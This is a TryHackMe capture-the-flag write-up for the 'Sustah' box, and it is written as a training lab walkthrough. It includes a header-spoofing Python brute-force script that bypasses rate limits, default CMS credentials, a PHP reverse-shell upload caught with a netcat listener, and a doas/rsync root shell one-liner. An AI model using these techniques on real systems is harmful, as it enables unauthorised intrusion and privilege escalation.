TryHackMe Sustah Writeup
This writeup will help you solve the Sustah box on TryHackMe. Before we start enumerating the box, add the following line to your /etc/hosts file.
echo “<box_ip> sustah.thm” >> /etc/hosts
Enumeration
We start by running a port scan on the host using nmap. The sC and sV flags indicate that basic vulnerability scripts are executed against the target and that the port scan tries to find version information.
nmap -sV -sC sustah.thm
The output of the scan can be seen below:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 bd:a4:a3:ae:66:68:1d:74:e1:c0:6a:eb:2b:9b:f3:33 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7zuGtMGKQdFrh6Y8Dgwdo7815klLm7VzG05KNvT112MyF41Vxz+915iRz9nTSQ583i1cmjHp+q+fMq+QGiO0iwIdYN72jop6oFxqyaO2ZjBE3grWHSP2xMsTZc7qXgPu9ZxzVAfc/4mETA8B00yc6XNApJUwfJOYz/qt/pb0WHDVBQLYesg+rrr3UZDrj9L7KNFlW74mT0nzace0yqtcV//dgOMiG8CeS6TRyUG6clbSUdr+yfgPOrcUwhTCMRKv2e30T5naBZ60e1jSuXYmQfmeZtDZ4hdsBWDfOnGnw89O9Ak+VhULGYq/ZxTh31dnWBULftw/l6saLaUJEaVeb
| 256 9a:db:73:79:0c:72:be:05:1a:86:73:dc:ac:6d:7a:ef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBENNM4XJDFEnfvomDQgg0n7ZF+bHK+/x0EYcjrLP2BGgytEp7yg7A36KajE2QYkQKtHGPamSRLzNWmJpwzaV65w=
| 256 64:8d:5c:79:de:e1:f7:3f:08:7c:eb:b7:b3:24:64:1f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOd1NxUo0xJ3krpRI1Xm8KMCFXziZngofs/wjOkofKKV
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Susta
8085/tcp open http syn-ack Gunicorn 20.0.4
| http-methods:
|_ Supported Methods: HEAD OPTIONS POST GET
|_http-server-header: gunicorn/20.0.4
|_http-title: Spinner
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see that ports 80 and 8085 are ports used by Apache and Gunicorn web servers. Furthermore, port 22 is used for SSH.
. When browsing to the document root we can see the following page for the web server running on port 80:
The following page can be seen by browsing to http://sustah.thm:8085:
Since the web server on port 80 does not reveal much information, we will try to find the secret number for the web server running on port 8085.
Finding the secret number
To find the secret number, we will intercept the number request using Burp Suite. Configure the proxy to use with Firefox. You should now intercept the request. Check the following screen:
Now right-click on the white field and click on “Send to Intruder”. Afterwards, click on the Intruder tab and change the payload positions. Make sure the only payload is the secret number. If all went well you should see the following screen on the intruder tab:
The payload should be a list of numbers from 1–100000. Make sure you create a list containing all these numbers. Run the intruder script for a few minutes and you should see numerous responses having the following content:
There seems a rate limit in place. This makes brute-forcing the secret number a bit more difficult. By searching the web, it becomes clear this rate limit can be bypassed. The solution was found on: https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass. Now we will use a Python script to brute-force the secret number. Also, take note of the new header requests which make sure we can continue brute-forcing and not be limited by a rate limit. The script can be seen below:
#!/usr/bin/env python3
import requests
import random
import sys
url = “http://sustah.thm:8085/"
for i in range(100000):
headers = {
“X-Originating-IP”: “127.0.0.1”,
“X-Originating-IP”: “127.0.0.1”,
“X-Forwarded-For”: “127.0.0.1”,
“X-Remote-IP”: “127.0.0.1”,
“X-Remote-Addr”: “127.0.0.1”,
“X-Client-IP”: “127.0.0.1”,
“X-Host”: “127.0.0.1”,
“X-Forwarded-Host”: “127.0.0.1”,
}
myobj = {‘number’: i}
x = requests.post(url, data=myobj, headers=headers)
if (“Oh no! How unlucky. Spin the wheel and try again.” not in x.text):
print(“{} is the lucky number!”, i)
sys.exit()
The script loopts through the possible numbers. Then for each number, a request is sent to find out if the number is the correct one. By adding the parameters to the header, we can bypass the rate limit. Only if the number was found, the number is printed. Run the script. After a few minutes you should find the number. Now you can answer the first question!
Initial foothold
By providing the secret number in the input field we acquire a new URL path: /YouGotTh3P@th. This path is used by the web server running on port 80. You can now browse to HTTP://sustah.thm/YouGotTh3P@th/ to find the following page:
Content Management Systems (CMS) are computer software used to manage and create content. One of the most famous examples of a CMS is WordPress. By checking the current page we can see the CMS is Mara. A quick search online shows us that we can log in using the ?login GET parameter. Browse to: HTTP://sustah.thm/YouGotTh3P@th/ and provide the default username and password: admin:changeme. You should now be logged in as admin and see the following page:
In the top header, you can see we are allowed to upload files. Mara CMS does allow all files to be uploaded. Using the upload function we are able to upload our reverse shell. Create a PHP file named: shell.php containing the file found here and upload using the upload functionality on the site:
Please note that you have to fill in the IP address of your local attacking machine and port number: 9001
The shell is now located at: http://sustah.thm/YouGotTh3P@th/img/.
Run the following commands on your attacking machine to start a netcat listener to catch the shell:
nc -lvnp 9001
Now browse to http://sustah.thm/YouGotTh3P@th/img/shell.php to start your reverse shell. You should now check the listening terminal and see the following lines appear:
Linux ubuntu-xenial 4.4.0–197-generic #229-Ubuntu SMP Wed Nov 25 11:05:42 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:14:45 up 58 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$
Improve your shell by running:
export TERM=xterm-256color
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
CTRL+Z
stty raw -echo;fg
ENTER
ENTER
Please note that the uppercase words are not commands, but keys combinations on your keyboard
User Flag
Now that we gained an initial foothold, we should find a way to gain more privileges and thus finding the user.txt flag. After an initial investigation we found an interesting file located at: /var/backups/.bak.passwd. The file contains the following lines:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
kiran:x:1002:1002:REDACTED:/home/kiran:
The plain-text password for the kiran user is found here! Use this password to log in as kiran by running: su kiran and providing the found password. The user.txt file is located in /home/kiran/user.txt
Root Flag
To complete this box, we have to find the root.txt flag. To do so we have to evelate privileges to the root user. Start off by running sudo -l to find commands we can execute as other users. The output is listed below:
Sorry, user kiran may not run sudo on ubuntu-xenial.
Unfortunately, we are not able to run sudo commands. The hint here shows us that we do not always have to use sudo. This reminded me of the doas command. To find what commands we can execute using this command we first have to find the configuration file. In the end I found the configuration file located at: /usr/local/etc/doas.conf. The content is listed below:
permit nopass kiran as root cmd rsync
This means that we can execute the rsync command as the root user. I checked GTFObins to find the sudo command for rsync. Then the final command will be:
doas rsync -e ‘sh -c “sh 0<&2 1>&2”’ 127.0.0.1:/dev/null
And we are the root user! The root.txt flag is located in /root/root.txt
This was an interesting box to complete. You needed some basic scripting knowledge in order to find the secret number. Furthermore, it was interesting to see that there exist some other commands which do the same as sudo.
